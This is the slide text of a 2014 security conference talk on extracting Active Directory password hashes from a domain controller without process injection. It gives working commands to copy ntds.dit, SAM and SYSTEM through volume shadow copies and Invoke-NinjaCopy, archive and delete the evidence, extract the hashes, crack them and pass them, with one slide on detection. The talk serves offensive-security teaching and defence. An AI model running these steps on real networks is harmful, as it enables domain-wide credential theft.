Dumping AD Hashes Without Process Injection

C817a5afedee0f3adc2d839e5094cc17?s=47 0xsalt
September 12, 2014

Dumping AD Hashes Without Process Injection

BSidesLA talk where I explore methods of dumping Active Directory Hashes without using tools that do Process Injection into lsass.exe



September 12, 2014


  1. Dumping AD Hashes Without Process Injection Russ Swift @0xsalt

  2. evolution and history non-injection methods getting tools to the dc

    volume shadow copy & powersploit export & extract History Methods Extraction DC Access VSS & PSH Cracking overview of cracking method hash passing tools Tools Detect detect vssown / ninjacopy activity?
  3. $ id swiftruss @0xsalt github.com/0xsalt blog.0xsalt.com InfoSec Manager at a

    financial services SaaS company in LA  West Coast: Hiring  East Coast: I know a guy 10 years infosec experience SANS Advisory Board For my good friends Mark, Jeff, Scott who will mock me while not understanding a lick of this -- this is not about hash that needs salt, hash that you smoke or hash that you tag someone with. They are not octothorpes. These are hashes that you dump, crack and pass. Thank you for interacting with me like a normal person despite all the 10101110001 I speak.
  4. 2000-2001+ pwdump2, pwdump3e, fgdump, pwdump6 : lsass injection  dll

    injection into lsass.exe.  DEP interaction causes crash & reboot 2007 "priv hashdump" since metasploit 3.0 : lsass injection  injects raw assembly code  AntiVirus API hooking causes crash & reboot 2010 "run hashdump" : no injection, needs system  direct registry access in memory  slow, no evidence, 100% safe  must have SYSTEM History
  5. 2011 mimikatz! : lsass injection  dumps cleartext from WDigest

    provider 2012 vssown.vbs : no injection, needs admin  Mark Baggett (@MarkBaggett) & Tim Tomes (@lanmaster53)  Derbycon 2 2013 Invoke-NinjaCopy powershell script : no injection, needs admin  parses NTFS structures directly  bypasses file locks, only SYSTEM access History
  6. Methods non-injection, let me count the ways  reboot dc

    to alternate media and copy files off  steal virtual container (GuestStealer v1.1 perl script to steal files via wget path traversal from old esx/vmware server systems)  rogue esx / hyper-v admins  metasploit run hashdump  vss service to copy ntds.dit, system, sam from live system  ninjacopy powersploit script
  7.  Hack, sniff, ask nicely  LM smb relay 

    WKS -> SRV -> AD Escalation  Have a hash / generate a hash DC Access Obtain an administrative credential
  8. Remote desktop Wce Psexec Mimikatz Winexe nmap + smb-exec.nse Meterpreter

    FingerprintEncryption Winrm + powershell DC Access Gain access
  9.  Find a reasonable writeable directory  AV exclusion folders

    are handy for this  Upload script(s) with meterpreter  Copy / paste into cmd window to create file  Copy via a file share DC Access
  10.  cscript vssown.vbs /list, /start, /create C, copy files, /delete

    [id] and/or stop service  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ ntds\ntds.dit .  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ system32\config\SAM .  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ system32\config\SYSTEM . VSS & PSH volume shadow copy service
  11.  cscript vssown.vbs /list  cscript vssown.vbs /start  cscript

    vssown.vbs /create C  cscript vssown.vbs /list VSS & PSH VSS: create volume shadow copy
  12. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ntds\ntds .dit . copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\system32\ config\SYSTEM . copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\system32\

    config\SAM . VSS & PSH VSS: copy ntds.dit, SYSTEM and SAM
  13.  rar a -rr2p -u -ep1 %computername%.rar -hp%computername% ntds.dit SYSTEM

    SAM  cscript vssown.vbs /list  cscript vssown.vbs /delete [id]  del ntds.dit & del SYSTEM & del SAM & del vss.vbs & del rar.exe VSS & PSH VSS: compress, copy off system, cleanup
  14.  .\Invoke-NinjaCopy.ps1 -Path "c:\windows\system32\config\SAM" - RemoteDestination "c:\temp\SAM" –ComputerName servername.domain.com 

    .\Invoke-NinjaCopy.ps1 -Path "c:\windows\system32\config\SYSTEM" -RemoteDestination "c:\temp\SYSTEM" -ComputerName servername.domain.com  .\Invoke-NinjaCopy.ps1 -Path "c:\windows\ntds\ntds.dit" - RemoteDestination "c:\temp\ntds.dit" –ComputerName servername.domain.com VSS & PSH powersploit invoke-ninjacopy
  15.  apt-get install bkhive samdump2  Download / extract libesedb

    from http://sourceforge.net/projects/libesedb/  Download / extract ntdsxtract from: http://www.csababarta.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip  cd libesedb  chmod +x configure  ./configure && make  Download / extract dshashes.py into NTDSXTRACT 1.0 folder from: http://ptscripts.googlecode.com/svn/trunk/dshashes.py Extraction on a linux system configure your tools
  16. ./esedbexport ../ntds.dit Extraction prep ntds.dit

  17. •./esedbexport ../ntds.dit Extraction prep ntds.dit

  18.  Csaba Barta ntdsxtract + dsusers.py patched version  python

    /home/swiftr/tools/vss/NTDSXtract\ 1.0/dshashes.py ./ntds.dit.export/datatable.3 ./ntds.dit.export/link_table.5 -- passwordhashes ./SYSTEM > domain_controller.hash.txt Extraction extract hashes
  19.  Csaba Barta ntdsxtract + dsusers.py patched version  python

    /home/swiftr/tools/vss/NTDSXtract\ 1.0/dshashes.py ./ntds.dit.export/datatable.3 ./ntds.dit.export/link_table.5 -- passwordhistory ./SYSTEM > domain_controller.hash.txt Extraction extract historical hashes : default=24
  20. ./john --pot=test.pot --session=lanman --format=LM hashes/lmntlm.txt ./john --pot=test.pot --session=ntlm --wordlist=mywordlist.lst --rules

    -- format=NT hashes/lmntlm.txt Cracking overview of cracking method
  21.  Create a wordlist from previously cracked passwords to create

    patterns  https://www.question-defense.com/2010/08/15/automated- password-cracking-use-oclhashcat-to-launch-a-fingerprint-attack  http://blog.thireus.com/cracking-story-how-i-cracked-over-122- million-sha1-and-md5-hashed-passwords Cracking Run oclHashcat fingerprint attack
  22.  impacket libraries (wmiexec, smbclient, smbrelayx)  WCE  mimikatz

     patched samba tools, winexe  firefox  xfreerdp (MS just released kb2871997 to address restricted admin)  pth to rdp session w/ no creds in memory (no kb2871997) -OR-  credentials are stored in WDigest in plaintext (yes kb2871997) Tools pass the hashes
  23.  intelligent log analysis  anomalous user activity alerting 

    anomalous network flows  leave VSS off by default, alert if it's turned on  DLP on DCs  correct audit settings on DCs  you do have full pcaps of all your egress traffic right?! Detect detect vssown / ninjacopy activity?
  24. evolution and history non-injection methods getting tools to the dc

    volume shadow copy & powersploit export & extract History Methods Extraction DC Access VSS & PSH Cracking overview of cracking method hash passing tools Tools Detect detect vssown / ninjacopy activity?
  25.  http://packetstormsecurity.com/Crackers/NT/  http://blog.gentilkiwi.com/downloads/mimikatz-asfws.pdf  https://code.google.com/p/ptscripts/source/browse/trunk/windows/vssown.vbs  https://community.rapid7.com/community/metasploit/blog/2010/01/01/safe-reliable-hash-dumping  https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

     http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket  http://www.ampliasecurity.com/research/wcefaq.html  http://passing-the-hash.blogspot.com/  @obscuresec Chris Campbell  Alva "Skip" Duckwall  https://code.google.com/p/passing-the-hash/  http://www.fyrmassociates.com/tools.html  http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl  http://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/  http://technet.microsoft.com/en-us/library/hh994571(v=ws.10).aspx  http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib  http://www.josho.org/blog/blog/2013/03/07/samex/  http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html  http://www.room362.com/blog/2013/06/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/  http://www.room362.com/blog/2013/06/11/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-2/ References